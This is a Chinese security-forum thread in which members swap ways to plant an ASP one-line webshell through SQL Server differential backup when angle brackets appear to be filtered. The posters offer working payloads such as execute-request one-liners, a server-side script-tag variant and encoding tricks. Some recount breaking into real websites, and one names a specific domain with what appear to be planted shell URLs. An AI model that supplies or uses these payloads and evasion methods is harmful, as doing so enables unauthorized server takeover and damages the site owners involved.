标题:
[讨论]遇到差异备分过滤了<>怎么办?
[打印本页]
作者:
冰绿茶
时间:
2008-7-23 08:26
标题:
[讨论]遇到差异备分过滤了<>怎么办?
[讨论]遇到差异备分过滤了<>怎么办?
议题作者:凋凌玫瑰
信息来源:邪恶八进制信息安全团队(
www.eviloctal.com
)
我在差异备后打开的文件显示如下:
Microsoft VBScript 编译器错误 错误 '800a0408'
无效字符
/gbook/test3.asp,行 71
%Execute(request("abc"))%
^
备分的代码是:<%%25Execute(request("ah"))%%25>
好像是"<>"被过滤了
不知道这种情况咋个解决,请高手指点.
帖子79 精华
12
积分3853 阅读权限100 性别男 在线时间55 小时 注册时间2006-2-26 最后登录2008-7-15
查看个人网站
查看详细资料
TOP
少女暴富的隐秘(图)
守护天使
晶莹剔透§烈日灼然
作者:
shirley
时间:
2008-7-23 08:26
[s:74] 我遇过
写成"%><%execute request("sb")%><%"这样来试试呢。。
帖子46 精华
0
积分76 阅读权限40 来自深圳 在线时间120 小时 注册时间2006-4-25 最后登录2008-2-29
查看详细资料
TOP
少女暴富的隐秘(图)
低调的沉默
晶莹剔透§烈日灼然
作者:
杰仔
时间:
2008-7-23 08:26
我的写成"%><%execute request("sb")%><%"不行!低调无罪,沉默有理
帖子2 精华
0
积分9 阅读权限40 在线时间3 小时 注册时间2006-10-9 最后登录2007-6-3
查看详细资料
TOP
软件项目外包
cool俊
晶莹剔透§烈日灼然
作者:
PLAN2000
时间:
2008-7-23 08:26
为什么不用nbsi3.0的log备份?
getwebshell就很好用..实在要差异备份.
就把一句木马转换成16进制再插入或者加上转义字符试试.还有可以把<>换成%lt;跟%gt;。换成%lt;,%gt;我没试过..不知道行不行...
详细自已到baidu搜搜啦..呵呵.我记不太清楚了
帖子3 精华
0
积分9 阅读权限40 在线时间15 小时 注册时间2005-6-14 最后登录2008-3-26
查看详细资料
TOP
凋凌玫瑰
荣誉会员
作者:
sam_slk
时间:
2008-7-23 08:26
nbsi3.0的log备份试了,根本就写不进去一句话,转换成十六进制也试了,不行.
帖子79 精华
12
积分3853 阅读权限100 性别男 在线时间55 小时 注册时间2006-2-26 最后登录2008-7-15
查看个人网站
查看详细资料
TOP
良辰择日,预测咨询,公司改名,权威易经
hack520
运维管理组
作者:
网飞鸿
时间:
2008-7-23 08:26
[s:75] 实话告诉你吧,没搞. [s:75]Www.China-Mu.Co.Kr 猪毛奇迹 1.02Q 将带给你无比的震撼。
帖子1082 精华
6
积分5597 阅读权限150 性别男 在线时间576 小时 注册时间2005-3-18 最后登录2008-7-2
查看个人网站
查看详细资料
TOP
少女暴富的隐秘(图)
cnhcerkf
运维管理组
作者:
XIELLP
时间:
2008-7-23 08:26
同意楼上的,楼主为什么不换一个别的思路?能够back了意思是不是DBO的权限,得到了目录呢?为什么不看下别的目录有没有可以利用的东西?如果有别的目录为什么不去下层目录呢?
如果能找到管理员的一个TXT你就应该发了。珍爱生命,潜心修炼,早日成仙。
帖子374 精华
2
积分3971 阅读权限150 性别男 在线时间708 小时 注册时间2006-8-27 最后登录2008-7-6
查看详细资料
TOP
让女孩一夜变的更有女人味
dsaddd
作者:
晨曦的男朋友
时间:
2008-7-23 08:26
提示: 作者被禁止或删除 内容自动屏蔽
帖子2 精华
0
积分-401 阅读权限0 在线时间0 小时 注册时间2006-10-9 最后登录2006-10-10
查看详细资料
TOP
某牛人
晶莹剔透§烈日灼然
作者:
车大炮
时间:
2008-7-23 08:26
如果真的过滤了<的话
会提示在那个地方出错??
其实没有过滤的
自己写段代码到ASP里面
看怎么才会出现类似的错误吧。
帖子28 精华
0
积分82 阅读权限40 在线时间55 小时 注册时间2006-3-2 最后登录2007-11-11
查看详细资料
TOP
神無月
晶莹剔透§烈日灼然
作者:
jencky
时间:
2008-7-23 08:26
要是确定是过滤<>了 估计没门了.
帖子124 精华
0
积分313 阅读权限40 性别男 在线时间37 小时 注册时间2006-4-22 最后登录2008-6-9
查看详细资料
TOP
凋凌玫瑰
荣誉会员
作者:
醉鞭名马
时间:
2008-7-23 08:26
引用:
这里是引用第[5 楼]的hack520于2006-10-09 22:44发表的:
[s:75] 实话告诉你吧,没搞. [s:75]
搞还是有搞,列了下目录我也拿到了websehll,只是我在想这种过滤的方式怎么去突破,因为很少遇到过.
帖子79 精华
12
积分3853 阅读权限100 性别男 在线时间55 小时 注册时间2006-2-26 最后登录2008-7-15
查看个人网站
查看详细资料
TOP
cnhcerkf
运维管理组
作者:
高尔夫1.8t
时间:
2008-7-23 08:26
楼上的,既然得了webshell,能否把代码帖出来的?看他什么以什么方式过滤,替换或者是什么的,可能有方法,就跟那个aaspsp似的。。珍爱生命,潜心修炼,早日成仙。
帖子374 精华
2
积分3971 阅读权限150 性别男 在线时间708 小时 注册时间2006-8-27 最后登录2008-7-6
查看详细资料
TOP
ring04h
团队执行官
作者:
ken2
时间:
2008-7-23 08:26
没可能过滤 <> 过滤了<>,他网站还能运行吗? 估计是%号的原因.
上面都有提示了 % 无效字符.
你试下这个 <script language=VBScript runat=server>execute request("sb")</Script>
帖子3923 精华
128
积分209640 阅读权限200 性别男 在线时间1096 小时 注册时间2007-10-23 最后登录2008-7-21
查看详细资料
TOP
hack520
运维管理组
作者:
Asker
时间:
2008-7-23 08:26
引用:
这里是引用第[10 楼]的凋凌玫瑰于2006-10-10 10:22发表的:
搞还是有搞,列了下目录我也拿到了websehll,只是我在想这种过滤的方式怎么去突破,因为很少遇到过.
偶滴意思是说,过滤了<>,要是通过bluk,确实木搞。当然咯,搞站大法也不是就这几下吧~~ [s:75] [s:75]Www.China-Mu.Co.Kr 猪毛奇迹 1.02Q 将带给你无比的震撼。
帖子1082 精华
6
积分5597 阅读权限150 性别男 在线时间576 小时 注册时间2005-3-18 最后登录2008-7-2
查看个人网站
查看详细资料
TOP
走在云上
晶莹剔透§烈日灼然
作者:
s369
时间:
2008-7-23 08:26
字符转换不行的话就不知道了哈哈我是菜鸟我怕谁
帖子13 精华
0
积分15 阅读权限40 在线时间17 小时 注册时间2006-8-9 最后登录2008-6-4
查看详细资料
TOP
菜菜阿哲
晶莹剔透§烈日灼然
作者:
biaofbi
时间:
2008-7-23 08:26
我杂遇见的比他还郁闷 我差异悲愤的整个马都消失了 猪三哥帮给看看贝
http://www.czfdcw.com.cn/yejie/text/articleshow.asp?id=14039
e:\czfdcw.com.cn\
悲愤出来的就没俺的一句话
帖子16 精华
0
积分46 阅读权限40 在线时间27 小时 注册时间2006-10-5 最后登录2007-7-19
查看详细资料
TOP
平安年间
晶莹剔透§烈日灼然
作者:
大胃仔
时间:
2008-7-23 08:26
前后加%><%execute request("#")%><%应是可行的,不过备份后可能又会出新的错误
什么什么无效字符类的提示
如果不行,可以试下lake2的unicode字符并非高手
帖子62 精华
2
积分245 阅读权限40 性别男 在线时间11 小时 注册时间2006-10-3 最后登录2008-5-13
查看个人网站
查看详细资料
TOP
akens
晶莹剔透§烈日灼然
作者:
dickson
时间:
2008-7-23 08:26
楼上的,话怎么说一半就说了呢
UNICODE具体怎么实现
帖子22 精华
0
积分59 阅读权限40 性别男 在线时间106 小时 注册时间2006-9-30 最后登录2008-6-21
查看详细资料
TOP
akens
晶莹剔透§烈日灼然
作者:
jazz
时间:
2008-7-23 08:26
我提交一句话出现这个问题
Active Server Pages 错误 'ASP 0141'
Page 命令重复
/ken.asp,行 714
@ 命令只能在 Active Server Page 中使用一次。
谁来解释下呢
帖子22 精华
0
积分59 阅读权限40 性别男 在线时间106 小时 注册时间2006-9-30 最后登录2008-6-21
查看详细资料
TOP
trace
晶莹剔透§烈日灼然
作者:
豆粒
时间:
2008-7-23 08:26
引用:
这里是引用第[18 楼]的akens于2006-10-23 15:14发表的:
我提交一句话出现这个问题
Active Server Pages 错误 'ASP 0141'
Page 命令重复
.......
估计他asp代码首句是
<%@language=VBScript%>
而你又指定了脚本语言一次.
帖子111 精华
0
积分304 阅读权限40 性别男 在线时间137 小时 注册时间2006-4-3 最后登录2008-7-4
查看详细资料
TOP
风云逸剑
晶莹剔透§烈日灼然
作者:
jerryho
时间:
2008-7-23 08:26
郁闷呀
我还遇上不能SA不能备份 [s:34]
帖子66 精华
0
积分212 阅读权限40 性别男 在线时间181 小时 注册时间2006-4-12 最后登录2008-7-18
查看详细资料
TOP
xunix
晶莹剔透§烈日灼然
作者:
杨羽
时间:
2008-7-23 08:26
我遇到的 和你差不多
我的还多一样,就是把我的所有的语句读给写三次
我传个文本上去居然也是三次
我这个的原因估计是我把IIS配置里面的那个防止错误选项勾上了
现在上网不方便也没有深究。
有条件的朋友那个2003实验一下做人还是脚踏实地的好
帖子4 精华
0
积分13 阅读权限40 性别男 在线时间11 小时 注册时间2006-5-29 最后登录2008-6-3
查看详细资料
TOP
追寻
荣誉会员
作者:
德军1941
时间:
2008-7-23 08:26
我一般备份不成功的话就会去尝试列目录找找网站的数据库。然后XXXX
帖子561 精华
2
积分4271 阅读权限100 性别男 在线时间525 小时 注册时间2006-9-23 最后登录2008-7-22
查看个人网站
查看详细资料
TOP
cnxhack
晶莹剔透§烈日灼然
作者:
狗狗汪汪
时间:
2008-7-23 08:26
[s:75]
http://www.czfdcw.com.cn/blog/net.asp
见多了.. 好搞.
http://www.czfdcw.com.cn/blog/321.asp
帖子17 精华
0
积分53 阅读权限40 性别男 在线时间6 小时 注册时间2006-5-3 最后登录2008-6-26
查看详细资料
TOP
可酷可乐
晶莹剔透§烈日灼然
欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com./)
Powered by Discuz! 7.2